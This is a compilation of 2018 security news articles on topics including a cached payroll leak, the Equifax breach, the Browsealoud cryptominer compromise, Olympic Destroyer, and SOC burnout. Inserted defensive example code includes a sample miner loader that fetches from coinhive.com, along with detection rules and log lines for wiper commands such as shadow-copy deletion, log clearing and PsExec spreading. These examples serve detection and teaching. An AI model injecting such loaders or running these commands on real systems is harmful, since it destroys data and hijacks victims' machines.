STE WILLIAMS

The strange case of the data breach that stayed online for a month

A couple of weeks ago Jeff* quit his job at the Singaporean branch of a major enterprise technology vendor that is, if not quite a household name, certainly known to most IT professionals.

Not long afterwards he Googled his old work employee ID number and was unpleasantly surprised to see the first result was a link to a spreadsheet with a name suggesting it contained details of the company’s Singaporean payroll.

Relief came in the form of a 404 error after his first click. But as an IT type, Jeff was curious to learn if Google had cached the file.

Unfortunately, his hunch was correct: the spreadsheet opened and divulged over 160 names of the company’s employees, the salaries they were paid, their home addresses and bank account details. Even marital status was listed.

Worse still, the spreadsheet suggested staff were being paid vastly different rates depending on gender and origin: not only were female employees’ salaries low, expat staff were being paid vastly more than their Singaporean colleagues. In these diversity-aware times, the spreadsheet was a corporate reputation nightmare waiting to happen.

Jeff wondered if only his ID number had this problem, so tried other employees’ ID numbers. All quickly brought up the same cached spreadsheet.

At which point Jeff complained to his former employer and contacted The Register.

D’oh, facepalm and WTF?

It was simple to verify his claims about how to find the leaked data. Jeff’s former employer quickly told us it was aware of the breach and had notified its staff and offered them help. The multinational company declined to name the source of the breach, told us staff were confident the breach wasn’t its fault and hinted that a third party was to blame.

Which wasn’t hard to conclude, because the URL Google produced included the domain name of a Singaporean service provider. That URL included directory names that suggested a test and development server had been exposed to the internet.

Such a mistake could come as the result of a simple fat-fingered fumble, but the Singaporean service provider told us the cause was a ransomware infection that reset the server’s security configuration. During the effort to repair the server, staff realised it was now in an insecure state, fixed that and tried to ensure the data was not accessible from the public Web.

The service provider told us they also contacted Google, asking it to flush its cache so leaked data would not remain visible to the world. By January 9th, 2018, the service provider’s IT staff were satisfied that their security had been restored and the personal data was no longer available.

Sadly, they were wrong. Jeff contacted The Register in the week of February 5th and we were able to view the personal data not long afterwards.

We therefore asked Google if it offers service levels for requests to flush its cache. The company told us it wouldn’t comment on an individual case and directed us to its instructions on how to “remove outdated content” and pointed out that document explains that to remove personal information there’s a Legal Removal Requests facility. Neither really explains how it would respond to a request to remove data from its cache.

It was El Reg wot won it?

Not long after The Register started asking questions of the Singaporean service provider, the cached data disappeared, leaving us more than a little suspicious about the service provider’s claim to have asked Google for a cache flush in early January.

At the conclusion of our inquiries we can say with certainty that the Singaporean service provider should have had ransomware-proof defences and that the multinational technology company should have done better due diligence of the companies it permits to access its payroll data. Security best practice has long recognised that you are only as secure as your partners permit you to be: one weak link in the chain can be enough to break you.

But we’re left uncertain if consideration of that chain also needs to factor in the quixotic nature of a web titan and its well-meaning but clearly dangerous cache. ®

*Not his real name. Nor have we used the names of the companies involved, or revealed the exact nature of how personal data was accessed, as we are not entirely satisfied the breach has been closed and the people whose personal information was leaked do not deserve increased risk.

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/02/13/the_strange_case_of_a_data_breach_and_the_web_cache_that_kept_personal_data_on_view_for_a_month/

UK Home Sec Amber Rudd unveils extremism blocking tool

UK Home Secretary Amber Rudd has announced a tool that purports to detect and block jihadist content online, and tech companies may end up being legally required to use it.

London-based firm ASI Data Science was handed £600,000 by government to develop the unnamed algorithm, which uses machine learning to analyse Daesh propaganda videos.

According to the Home Office, tests have shown the tool automatically detects 94 per cent of Daesh propaganda with 99.995 per cent accuracy.

The department claimed the algorithm has an “extremely high degree of accuracy”, with only 50 out of a million randomly selected videos requiring additional human review.

Many companies with huge online platforms, such as Google and Facebook, already claim to have developed technology to root out extremist content. But the government said its algorithm could be used by smaller platforms that do not have the same level of resources to develop such technology.

Rudd told the Beeb the government would not rule out taking legislative action “if we need to do it”.

In a statement she said: “The purpose of these videos is to incite violence in our communities, recruit people to their cause, and attempt to spread fear in our society. We know that automatic technology like this, can heavily disrupt the terrorists’ actions, as well as prevent people from ever being exposed to these horrific images.”

Rudd is currently touring Silicon Valley for a series of meetings with the main communication service providers to discuss tackling terrorist content online.

However, she has been subject to some ridicule by the sector: previously speaking about preventing the uploading of objectionable content, she said the government needs to get people who “understand the necessary hashtags” talking.

She has also admitted that she doesn’t know how encryption works, and has criticised “patronising” techies that “sneer” at politicians.

During her visit to the US west coast, Rudd will discuss what companies are doing to develop methods that identify Daesh propaganda, and support smaller companies, such as Vimeo, Telegra.ph and pCloud to remove terrorist content from their platforms.

As part of her two-day visit to San Francisco, she will meet Secretary of Homeland Security Kirstjen Nielsen to discuss how the UK and US can work together to tackle terrorist content online, and the pair will appear at a Digital Forum event later today.

Rudd will also meet the Global Internet Forum to Counter Terrorism, which was launched last year following a roundtable convened at the Home Office in the aftermath of the Westminster Bridge attack. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/02/13/amber_rudd_extremism_blocking_tool/

Still not on Windows 10? Fine, sighs Microsoft, here are its antivirus tools for Windows 7, 8.1

Microsoft has back-ported its Windows Defender Advanced Threat Protection (ATP) antivirus tool from Windows 10 to Windows 7 and 8.1.

The release will allow those holding out with older versions of the OS to get some of the same exploit and malware-infection prevention and event reporting features it offers on Windows 10, particularly when used with Windows Defender.

For enterprises, the extension to Windows 7 and 8.1 will, more importantly, allow admins to bring their older machines under the same security management and administration tools they use for Windows 10 PCs.

This is where Microsoft is focusing its pitch: by adding ATP to Windows 7 and 8.1, Redmond hopes it will convince sysadmins to add those machines to the Windows Defender monitoring systems they use for Windows 10 devices and, in the process, prod companies towards migrating the older PCs to Windows 10.

“We hear from our customers security is one of the biggest motivators for their move to Windows 10,” wrote Craig Lefferts, partner director of security and enterprise for the Windows and Devices group, earlier today.

“Meanwhile, we know that while in their transition, some may have a mix of Windows 10 and Windows 7 devices in their environments.”

Microsoft noted that Windows 7 is still slated for retirement in January of 2020.

Meanwhile, the software giant is also looking to extend ATP support for non-Windows devices by signing up another partner for its security push. SentinelOne will be adding ATP support to the EndPoint Protection Platform security tool it sells for Windows, Mac, Linux, and VDI. This means administrators can set up SentinelOne to automatically pass alerts along to management consoles via ATP. ®

Speaking of Windows…

Meanwhile, those signed up to the Windows Insider program will get their hands on a few more pre-release features to try out this month. Build 17093 sports changes to the Game Bar recording and streaming menu, as well as the ability for more PCs to stream HDR video via the Video Playback menu in the Settings app.

Build 17093 also adds a new Graphics menu specifically for multi-GPU PCs and the ability for all Insider build PCs to delete diagnostic data from their machines.

Those running Windows S will now be able to use the Authenticator App and Windows Hello to log in without passwords, through their mobile devices. Windows Defender has also been updated to work with Windows Hello to manage accounts via their phone’s fingerprint, facial recognition, or PIN screens.

Other new additions include updates to Eye Control, single-click pairing for Bluetooth, full-screen (F11) mode for Edge, and better multilingual text support.

Finally, progressive web apps are at last coming to Microsoft Edge and Windows 10.

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/02/12/microsoft_windows_atp/

Equifax hack worse than previously thought: Biz kissed goodbye to card expiry dates, tax IDs etc

Last year, Equifax admitted hackers stole sensitive personal records on 145 million Americans and hundreds of thousands in the UK and Canada.

The outfit already said cyber-crooks “primarily” took names, social security numbers, birth dates, home addresses, credit-score dispute forms, and, in some instances, credit card numbers and driver license numbers. Now the credit-checking giant reckons the intruders snatched even more information from its databases.

According to documents provided by Equifax to the US Senate Banking Committee, and revealed this month by Senator Elizabeth Warren (D-MA), the attackers also grabbed taxpayer identification numbers, phone numbers, email addresses, and credit card expiry dates belonging to some Equifax customers.

Like social security numbers, taxpayer ID numbers are useful for fraudsters seeking to steal people’s identities or their tax rebates, and the expiry dates are similarly useful for online crooks when linked with credit card numbers and other personal information.

Contradictory

“As your company continues to issue incomplete, confusing and contradictory statements and hide information from Congress and the public, it is clear that five months after the breach was publicly announced, Equifax has yet to answer this simple question in full: what was the precise extent of the breach?” Warren fumed in a missive late last week.

Equifax spokeswoman Meredith Griffanti stressed to The Register today that the extra information snatched by hackers, as revealed by Senator Warren, belonged to “some” Equifax customers. In other words, not everyone had their phone numbers, email addresses, and so on, slurped by crooks – just some. How much is some? Equifax isn’t saying, hence Warren’s (and everyone else’s) growing frustration.

The senator is a cosponsor of the proposed Data Breach Prevention and Compensation Act, which, if passed, would impose computer security regulations on credit reporting agencies, with mandatory fines that would have led to Equifax coughing up $1.5bn for its IT blunder.

Some regulation or punishment is obviously needed.

No senior Equifax executives were fired over the attack – instead the CEO, CSO and CIO were all allowed to retire with multi-million dollar golden parachutes. The US government’s Consumer Financial Protection Bureau promised a full investigation into the Equifax affair, and then gave up. On February 7, an open letter [PDF] from 32 senators to the bureau asked why the probe was dropped, and the gang has yet to receive a response. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/02/13/equifax_security_breach_bad/

One in Three SOC Analysts Now Job-Hunting

The more experienced a SOC analyst gets, the more his or her job satisfaction declines, a new survey of security operations center staffers shows.

Landing a job as an entry-level security operations center (SOC) analyst often provides a foot in the door to the cybersecurity field, but a new survey shows the more seasoned a SOC staffer gets, the more likely he or she will become disillusioned with the position.

New data from the Cyentia Institute’s “Voice of the Analyst Study” of security operations center teams shows that while three in four SOC analysts are satisfied with their jobs, some 45% say the reality of the SOC isn’t what they had expected. Some 70% of entry-level (one to two years’ experience) SOC analysts say their job meets their expectations, while just 43% of more experienced SOC analysts say so, according to the report, commissioned by SOC automation vendor Respond Software.

As one SOC analyst respondent quoted in the report explained, the novelty of a new SOC gig basically wears off after a while: “I was drawn to the SOC by misguided youthful ideals, which have been ground into a fine powder by years of poor management and lack of support from higher-ups.”

The report, provided in advance of its publication to Dark Reading, also found that job dissatisfaction ranks 25% higher among experienced SOC staffers, and that one in three SOC analysts overall is currently job-hunting for a position elsewhere. Of the 160 respondents, three-quarters are SOC analysts, 20% SOC managers, and 5% engineers or project managers in the SOC.

Wade Baker, co-founder of The Cyentia Institute and an author of the report, says he had expected entry-level SOC analysts to be the most unhappy members of the SOC, not the seasoned ones. “It was counterintuitive to me. I thought the quintessential entry-level analysts feel less respected and maybe more dissatisfied. We found the opposite: the longer you’re in the SOC and the more experience you have, dissatisfaction and things like that grow,” Baker says.

SOC analysts say they were drawn to their positions for a new challenge, skills, more money, and as a way to make a difference, but those same incentives also are what’s drawing them to leave their current jobs, according to the report. “If you want to keep them around, offering those same positives in-house is just as important as eliminating the negatives that drive them out,” the report says. “Roughly 3 out of 4 point to a desire for more intellectually challenging work, the chance to learn new skills, and/or a chance to defend and help the business.”

Change of SOCs

Entry-level, or Tier 1, SOC analyst positions are notoriously high-burnout gigs. Sitting in front of a monitor and manually clicking through thousands of raw alerts from firewalls, IDS/IPS, SIEM, and endpoint tools, looking for that needle in a haystack, is at the same time both monotonous and stressful. Ignoring an alert tied to a real attack happens: just ask Target, which in 2013 dismissed as false positives the alerts that flagged its massive breach.

SOC experts say the job of the entry-level SOC analyst gradually will be replaced with automation and orchestration technologies that streamline the traditionally manual, front-line role. The Tier 1 analyst position will evolve into a new more advanced role akin to the Tier 2 analyst, who triages flagged alerts.

“For me, the SOC of the future is having as much done automatically as possible” on the front lines, says Brett Wahlin, the former CISO at HP. The first human to touch the event data, a next-generation SOC Level 2 analyst, would step in only once an event crosses a set threshold, for example. “It takes a human touch to see if you actually have got a bad guy or not,” he says.

Today’s Tier 1 SOC analyst job basically was born out of the mass of logs security tools produce, notes Josh Maberry, CISO at Critical Start, an MSSP. “The Tier 1 analyst was never supposed to be a manual-event job in the first place. It became that as a necessity because there weren’t any automation and orchestration [tools] there yet,” he says. “They [became] eye filters … So analysts began to drown. The whole thing became an events-to-bodies ratio.”

It’s those factors that have led to the high turnover in the SOC, experts say. The most time-consuming task in the SOC is monitoring, followed by intrusion analysis and shift operations handoff duties, according to the Cyentia SOC analyst survey. “The notion of monitoring taking a lot of time is not surprising,” says Mike Armistead, co-founder and CEO of Respond Software, noting that analysts rank monitoring low among the tasks they want to be doing.

Shift operations are also considered a burden: that’s when analysts receive feedback on their incident reports, or transfer information during the handoff of their shifts. “That’s the place where tribal knowledge is transferred among people,” he says, so if SOC analysts are unhappy with that process, it could be a red flag for the organization.

New data published today from a separate study by Advanced Threat Analytics (ATA) of 50 managed security service providers (MSSPs) gives a glimpse of the volume of security alerts MSSPs face: nearly 45% say they see a 50% or higher rate of false positives, and 64% say it takes an average of 10 minutes or more to investigate each alert.

That volume of alerts forces SOC analysts of all levels to spend in some cases more than five hours a day investigating even false positives, according to that study. Alin Srivastava, president of ATA, says that distracts the MSSPs’ SOC analysts from real threats and incidents.

According to Cyentia’s SOC report, the analysts surveyed rate monitoring as the task least likely to catch an intruder. “You get the sense [from the survey] that they feel a lot of time is wasted on relatively low-value efforts,” Cyentia’s Baker says.

Automation can help eliminate the low-level, repetitive monitoring tasks that “require human fingers more than human brains,” the report says. Threat hunting and forensics, meanwhile, still require humans to handle that level of analysis.

Black Hat Asia returns to Singapore with hands-on technical Trainings, cutting-edge Briefings, Arsenal open-source tool demonstrations, top-tier solutions and service providers in the Business Hall. Click for information on the conference and to register.

Kelly Jackson Higgins is Executive Editor at DarkReading.com. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise …

Article source: https://www.darkreading.com/vulnerabilities---threats/one-in-three-soc-analysts-now-job-hunting/d/d-id/1331040?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Attackers Use Infected Plug-In to Install Cryptomining Tool on Over 4200 Websites

Victims include the UK’s ICO and National Health Service, and USCourts.gov.

Over 4,200 websites were infected last weekend with a tool that quietly used the computers of people visiting the sites to mine for the Monero cryptocurrency.

Unknown attackers installed the mining software by compromising a third-party browser plug-in called Browsealoud that many websites use to provide speech navigation capabilities for people who need additional support.

Scott Helme, the UK-based researcher who first reported on the campaign, says it is unclear how the attackers managed to compromise Browsealoud in order to distribute the mining tool. But TextHelp, the company that provides the plug-in, has taken it down, so the campaign has been effectively stopped.

“The broad takeaway from this is that sites which load content from a supplier like this are at the mercy of that supplier unless they protect themselves,” Helme says.

Many of the impacted sites belonged to organizations in the UK and included those of major government organizations such as the Information Commissioner’s Office, National Health Service, General Medical Council, and Student Loans Company.

Also affected were the websites of the Administrative Office of the United States Courts, the Indiana government, and the Cook County Treasurer’s office in Illinois.

According to Helme, the attackers altered the Browsealoud JavaScript library so it added a Coinhive Monero cryptocurrency miner to any page that loaded the plug-in. A majority of sites using the plug-in appear to belong to government organizations, based on the list of affected websites, Helme says.

The campaign is the latest to highlight the trend of threat actors hijacking computers and using them to mine for various cryptocurrencies. Mining tools like Coinhive are designed to use a computer’s resources to verify blockchain transactions. Many people voluntarily install such mining software and allow their computers to be used as part of a wider pool of systems for cryptocurrency mining. In return they get paid in digital coins.

Threat actors have latched on to crypto mining as a way to make quick and safe money. Instead of infecting computers to steal data or to extort money from victims, a growing number of attackers have begun hijacking computers and quietly putting them to use in cryptocurrency mining. In other cases, attackers install the mining tools on websites and hijack the resources of anyone using those sites.

Victims often don’t realize their computers are being used for the purpose and most of the mining software itself is legitimate and therefore not always flagged as malicious or unwanted. Researchers at Cisco’s Talos security unit recently estimated that an attacker using a botnet of 2,000 hijacked computers can earn upwards of $180,000 a year from cryptocurrency mining.

Organizations can relatively easily protect their websites from being compromised by third-party plug-ins and content by implementing Content Security Policy (CSP) and Subresource Integrity (SRI), says Helme. “[These] are two mechanisms that allow a site to control which other sites are allowed to load content into their pages and what content they’re allowed to load,” he says.

For instance “browsealoud.com” could be in the list of allowed sites but “coinhive.com” wouldn’t be, so the Coinhive script wouldn’t be loaded, Helme notes.

“SRI allows you to check a file by adding an integrity attribute, sometimes called a fingerprint,” Helme said. “If the file changes, the fingerprint changes and we can detect that.”

In the present instance, such an integrity check would have detected the change in the Browsealoud script and prevented it from loading. Admins can also use CSP to require that all scripts on the page have SRI enabled, so no checks are missed. “Coupled together, these are the perfect pair,” Helme says.

“These would have helped the affected sites and would have prevented the infected file from being loaded.”
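The two mechanisms Helme describes, as an added example that is not the article’s, Helme’s or TextHelp’s code: the SRI value is computed from the vendor script as originally published and pinned in the tag; a browser that later fetches a tampered copy recomputes the digest, finds a mismatch and refuses to execute the file. The CSP header allows scripts only from the site itself and the vendor origin named above, so a miner hosted on coinhive.com is not in the allow-list. The script bodies and the script path are constructed stand-ins, not the real Browsealoud library; the hostnames are the ones the article mentions.

```python
"""Added example (not code from the article, from Scott Helme or from TextHelp):
generating a Subresource Integrity (SRI) value for a third-party script,
checking a fetched copy against it the way a browser does, and the matching
Content Security Policy. The script bodies and the script path are constructed
stand-ins, not the real Browsealoud library."""
import base64
import hashlib
import hmac

SRI_ALGOS = ("sha256", "sha384", "sha512")  # the only digests browsers accept for SRI

# Constructed stand-in for the vendor library as originally published.
ORIGINAL_SCRIPT = b"window.BrowseAloud = { speak: function (el) { /* read el aloud */ } };\n"

# Constructed stand-in for the tampered copy: the same library with a miner
# loader appended, mirroring the injection described above.
INFECTED_SCRIPT = ORIGINAL_SCRIPT + (
    b"var s = document.createElement('script');"
    b"s.src = 'https://coinhive.com/lib/coinhive.min.js';"
    b"document.head.appendChild(s);\n"
)


def sri_hash(body: bytes, algo: str = "sha384") -> str:
    """Value for a <script integrity="..."> attribute, computed from the file as
    published. sha384 is the conventional choice."""
    if algo not in SRI_ALGOS:
        raise ValueError("SRI permits only sha256, sha384 or sha512")
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def sri_matches(integrity: str, fetched: bytes) -> bool:
    """Mirror the browser's check: digest what was actually fetched and compare it
    with the pinned value. Any change to the file, including an appended miner
    loader, produces a different digest and the script is not executed."""
    algo, _, expected = integrity.partition("-")
    if algo not in SRI_ALGOS:
        return False
    actual = sri_hash(fetched, algo).partition("-")[2]
    return hmac.compare_digest(actual.encode("ascii"), expected.encode("ascii"))


def script_tag(src: str, integrity: str) -> str:
    """The tag a site embeds. crossorigin is needed for SRI on a cross-origin
    script so the browser is permitted to read the response bytes it hashes."""
    return f'<script src="{src}" integrity="{integrity}" crossorigin="anonymous"></script>'


def csp_header(allowed_script_origins: list) -> str:
    """Allow-list of script origins. The miner is hosted on coinhive.com, which is
    absent, so even an injected loader could not fetch it. require-sri-for was an
    experimental directive (Chrome behind a flag, Firefox behind a pref in 2018)
    and is kept here to show the intent of demanding SRI on every script."""
    sources = " ".join(["'self'"] + list(allowed_script_origins))
    return f"Content-Security-Policy: script-src {sources}; require-sri-for script"


def demo() -> dict:
    pinned = sri_hash(ORIGINAL_SCRIPT)
    return {
        # hypothetical path on the vendor origin the article names
        "tag": script_tag("https://www.browsealoud.com/ba.js", pinned),
        "csp": csp_header(["https://www.browsealoud.com"]),
        "original_loads": sri_matches(pinned, ORIGINAL_SCRIPT),
        "infected_loads": sri_matches(pinned, INFECTED_SCRIPT),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The check has one operational cost worth knowing: the pinned digest is bound to one exact version of the file, so a legitimate vendor update also fails the check until the site republishes the tag. That is the point of SRI, and it is why the vendor update path should become a reviewed change rather than a silent one.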

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year …

Article source: https://www.darkreading.com/attacks-breaches/attackers-use-infected-plug-in-to-install-cryptomining-tool-on-over-4200-websites/d/d-id/1331043?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Cyberattack Aimed to Disrupt Opening of Winter Olympics

Researchers who identified malware targeting the 2018 Winter Olympics say the attackers had previously compromised the Games’ infrastructure.

A cyberattack targeting the 2018 Winter Olympics in Pyeongchang, South Korea aimed to cause disruption at the start of the Games and required deep knowledge of the infrastructure – a sign the attackers had previously compromised it, according to researchers.

The attack took place prior to the Opening Ceremonies held on Friday, Feb. 9 and interfered with TV and Internet systems. Olympics officials confirmed technical issues affecting non-critical systems and completed recovery within 12 hours. On Sunday, Feb. 11, they confirmed that a cyberattack had taken place but didn’t offer additional details.

Researchers at Cisco Talos identified malware samples used in the attack “with moderate confidence” and report the infection vector is currently unknown. Evidence indicates the actors responsible were not seeking information or monetary gain: Their primary goal was likely to cause destruction.

‘Olympic Destroyer’

The so-called “Olympic Destroyer” malware studied by Cisco renders machines unusable by deleting shadow copies and event logs, and tries to use PsExec and WMI to move across the environment. Talos analysts point out they had previously seen this behavior in both the BadRabbit and Nyetya (NotPetya) attacks.

The initial malware sample is a binary that drops multiple files onto the target machine. From there, the malware moves laterally throughout the network, using two information stealers and hardcoded credentials within the binary. Talos found 44 individual accounts in the library and says the malware author knew several technical details about the Olympics infrastructure including username, domain name, server name, and password data.

“This is a targeted attack and this involves some reconnaissance,” says Craig Williams, director of Cisco Talos outreach. “The attacker came into the campaign knowing a large number of accounts. That involves, obviously, a phishing campaign or an intelligence-gathering campaign.”

A key takeaway is this malware doesn’t use an exploit to spread, Williams continues. It spreads through normal tools using valid credentials, a tactic that will help attackers evade most security tools.

The destructive part of the attack starts during execution. After files are written to disk, the malware deletes all possible shadow copies on the system. It then takes steps to complicate file recovery and ensure the Windows recovery console doesn’t try to repair anything on the host.

“Wiping all available methods of recovery shows this attacker had no intention of leaving the machine usable,” Talos researchers report. The purpose of the malware is to perform destruction of the host, leave the system offline, and wipe remote data. It also disables all services on the system.
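The behaviours described above (shadow copies deleted, event logs cleared, recovery disabled, then spreading with legitimate tools and valid credentials) are what a SOC can actually detect, because none of them needs an exploit. The following is an added example, not code from the article or from Talos, McAfee or CrowdStrike: a small behaviour-based scan over constructed process-creation log lines. The commands it matches are the ordinary Windows tools used for those actions; they are not a claim about the exact command lines the Olympic Destroyer sample ran, which the article does not list. Hosts, users, timestamps and the pipe-delimited log format are invented for the example.

```python
"""Added example (not from the article, Cisco Talos, McAfee or CrowdStrike):
behaviour-based detection of the wiper actions described above, run over
constructed process-creation log lines. The commands matched are the ordinary
Windows tools that delete shadow copies, clear event logs and disable recovery;
they are not a claim about the exact command lines the Olympic Destroyer sample
ran, which the article does not list. Hosts, users and timestamps are invented."""
import re
from collections import defaultdict

# Constructed sample in a hypothetical "timestamp|host|user|image|command line" format.
SAMPLE_LOG = r"""
2018-02-09T19:58:01|pc-press-07|svc_print|C:\Windows\System32\vssadmin.exe|vssadmin.exe delete shadows /all /quiet
2018-02-09T19:58:02|pc-press-07|svc_print|C:\Windows\System32\wbem\WMIC.exe|wmic shadowcopy delete
2018-02-09T19:58:03|pc-press-07|svc_print|C:\Windows\System32\bcdedit.exe|bcdedit.exe /set {default} recoveryenabled no
2018-02-09T19:58:04|pc-press-07|svc_print|C:\Windows\System32\wevtutil.exe|wevtutil.exe cl System
2018-02-09T19:58:05|pc-press-07|svc_print|C:\Tools\PsExec.exe|PsExec.exe \\pc-press-08 -u OLYMPICS\svc_print -p ******** -accepteula cmd.exe
2018-02-09T19:59:10|pc-admin-02|jlee|C:\Windows\System32\vssadmin.exe|vssadmin.exe list shadows
2018-02-09T20:01:44|pc-admin-02|jlee|C:\Windows\System32\wevtutil.exe|wevtutil.exe qe Security /c:5
"""

# Each rule names one behaviour from the write-up. The patterns deliberately
# ignore read-only variants (vssadmin list, wevtutil qe) that admins run legitimately.
RULES = [
    ("shadow_copy_deletion",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows|wmic\s+shadowcopy\s+delete|wbadmin(\.exe)?\s+delete\s+catalog", re.I)),
    ("recovery_disabled",
     re.compile(r"bcdedit(\.exe)?\s+/set\s+\{default\}\s+(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)", re.I)),
    ("event_log_cleared",
     re.compile(r"wevtutil(\.exe)?\s+cl\s+\S+", re.I)),
    ("remote_exec_tool",
     re.compile(r"psexec(\.exe)?\s+\\\\\S+|wmic\s+/node:", re.I)),
]


def parse_line(line: str) -> dict:
    ts, host, user, image, cmd = line.split("|", 4)
    return {"ts": ts, "host": host, "user": user, "image": image, "cmd": cmd}


def match_rules(cmd: str) -> list:
    """Names of every rule the command line triggers (empty for benign use)."""
    return [name for name, rx in RULES if rx.search(cmd)]


def scan(log_text: str) -> list:
    """One finding per (event, rule) pair, in log order."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = parse_line(line)
        for rule in match_rules(event["cmd"]):
            findings.append({**event, "rule": rule})
    return findings


def wiper_hosts(findings: list, min_distinct: int = 3) -> list:
    """Correlate per host: any single behaviour can be legitimate admin work, but
    several distinct ones from one host in a short window is the wiper pattern
    (recovery removed, logs cleared, then spreading with valid credentials)."""
    by_host = defaultdict(set)
    for f in findings:
        by_host[f["host"]].add(f["rule"])
    return sorted(h for h, rules in by_host.items() if len(rules) >= min_distinct)


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for h in hits:
        print(f"{h['ts']} {h['host']} {h['user']} {h['rule']}: {h['cmd']}")
    print("escalate:", wiper_hosts(hits))
```

The correlation step matters more than the individual patterns: a backup administrator will trigger shadow_copy_deletion on its own, and PsExec is a normal sysadmin tool, which is exactly why the article notes that credential-based spreading evades most security tools. Several distinct destructive behaviours from one host under one account in a minute is the signal.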

Earlier Attacks on the Olympics

This isn’t the first instance of an attack targeting the 2018 Winter Games.

McAfee Advanced Threat Research previously detected a fileless attack targeting organizations involved with the Pyeongchang Olympics. The threat used a PowerShell implant to connect target machines with the attacker’s server and transfer system-level data. At the time, researchers were unsure what happened after the attacker gained access.

Now they say this attack had a second-stage payload in the form of Gold Dragon, a Korean-language implant detected in December 2017. Gold Dragon has stronger persistence than the original PowerShell payload and expanded capabilities for profiling target systems. It lets an attacker gather information on system processes, files, registry content, and data.

In early February, prior to the Opening Ceremonies, researchers updated their findings to report another variant of the fileless implant in a new malicious document. This document had the same metadata properties and same information as the campaign discovered in January.

“It’s an indication the attacker has resumed deploying a new version of this implant,” says Ryan Sherstobitoff, senior analyst of major campaigns at McAfee. “Gold Dragon is a more persistent type of implant that gave them far-reaching capabilities on the network.”

Targeted attacks have different stages of payloads, he explains. The first gives them access; the second installs something more persistent. In this case, the earlier fileless attack could have given a threat actor the entry to drop Gold Dragon on the target network.

Sherstobitoff emphasizes there is no indication the attacker behind the earlier campaign is connected to the Opening Ceremonies-timed attack. However, Gold Dragon could have given them the level of access to collect the information they needed to conduct it.

CrowdStrike identified samples of a previously unknown malware family seemingly designed for data destruction. Earliest samples were detected on Feb. 9, the day of the Opening Ceremonies. All samples have sets of hard-coded credentials belonging to Olympics-related targets that let threat actors spread in a target network. Several attackers had access to organizations related to the targets through malicious backdoors, CrowdStrike reports, but it can’t confirm whether anyone used this access to deliver malware.

Too Soon to Determine Whodunnit

“I don’t want to say it’s trivial, but it’s not the most complicated piece of malware,” says Warren Mercer, Cisco Talos technical lead for engineering, of the attack his team studied. “There’s no crazy effort to try and obfuscate their code; there are no super-advanced techniques.”

However, he continues, it’s likely a sophisticated attacker is at play given the previous access to Olympics systems and ability to hardcode lifted credentials. The question is, which one?

“It’s a tricky question when it comes to who could be behind a threat like this,” adds Williams. This could be a new threat actor or group, he says, adding that many well-funded campaigns have pockets of developers. Attribution is further complicated by the publicity of widespread attacks like NotPetya, which have given rise to “copycats” who may be responsible, he notes.

Meanwhile, the US-CERT has issued a statement on cybersecurity at the Olympics and offered guidance for attendees to protect themselves against threats including data theft and third-party monitoring, as attackers may take advantage of the large audience to spread messages.

Engin Kirda, cofounder and chief architect at Lastline, points out that denial-of-service campaigns are among the easiest attacks to mount against large events like the Olympics. Beyond event attendees and organizers, fans are often targeted with phishing emails, domain theft, ransomware, and fake social media posts. These days, employees can expect to see malicious emails related to the Games.

“If an employee falls victim to one of these attacks on a work machine, it may put their business at risk as well,” Kirda notes. “IT teams should caution employees about clicking on links or attachments from Olympics-related emails.”


Kelly Sheridan is Associate Editor at Dark Reading. She started her career in business tech journalism at Insurance Technology and most recently reported for InformationWeek, where she covered Microsoft and business IT. Sheridan earned her BA at Villanova University.

Article source: https://www.darkreading.com/attacks-breaches/cyberattack-aimed-to-disrupt-opening-of-winter-olympics-/d/d-id/1331044?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

See that over Heathrow? It’s not an airliner – it’s a Predator drone

Military efforts to approve the flying of Predator military drones through Britain’s skies could pave the way for point-to-point drone deliveries, newly disclosed correspondence has revealed.

The detailed discussions, held between various Ministry of Defence (MoD) agencies and the Civil Aviation Authority, took place to enable the flying of Predator drones in UK airspace. While the military initially hoped they could fly their Predators (quaintly renamed “Protector” in 2016) everywhere, discussion with the CAA led to their ambitions being scaled back.

Unmanned aircraft technology is posing an increasing challenge for regulators as the hype and excitement of the tech world meets the hard and unforgiving laws of aviation – and of physics.

Referred to in the documents, as obtained by campaign group Drone Wars UK, was the government’s “strategy aspiration for Beyond Visual Line of Sight (BVLOS) flying for all Unmanned Aerial Vehicles by 2020.” This forms part of its otherwise rather quiet Pathfinder Program for drone technology. Routine BVLOS approval is the Holy Grail the drone industry wants from aviation regulators, because it unlocks the door for businesses to start commercial-scale unmanned deliveries of the type proposed by Amazon.

Similarly, “anywhere, any time” BVLOS with aeroplane-sized drones, as the MoD wanted regulatory approval to carry out, would be a genuinely revolutionary development for the freight sector. While the main missions for Predators are spying on people and dropping bombs on them, the aviation technology aspects are a fascinating insight into the drones of tomorrow.

It is wise not to lose sight of the MoD’s ultimate aim for its unmanned aircraft, as Drone Wars UK warned.

“There is little sign in the papers of anyone suggesting the need for a proper parliamentary or public debate about the implications and impact of flying large military drones within the UK other than the acceptance of a need for a ‘communications strategy’ to persuade the public to accept such flights,” said Cole.

What’s your vector, Victor?

The International Civil Aviation Organisation (ICAO) splits airspace up into seven classes, for air traffic control (ATC) and collision avoidance purposes, as the UK’s NATS air traffic control company explains on its website.

Six of these – A to G, minus F – are in use in the UK today. Classes A-E are “controlled airspace”, meaning you need ATC permission to fly through it (strictly, in Class E only IFR traffic needs a clearance). The level of control is highest in Class A airspace and lowest in Class E. Class G is uncontrolled airspace, where the principle is “see and avoid”. You don’t need permission to fly in Class G – and, equally, there’s nobody on the end of a radar scope keeping an eye out for other aircraft approaching yours, either.

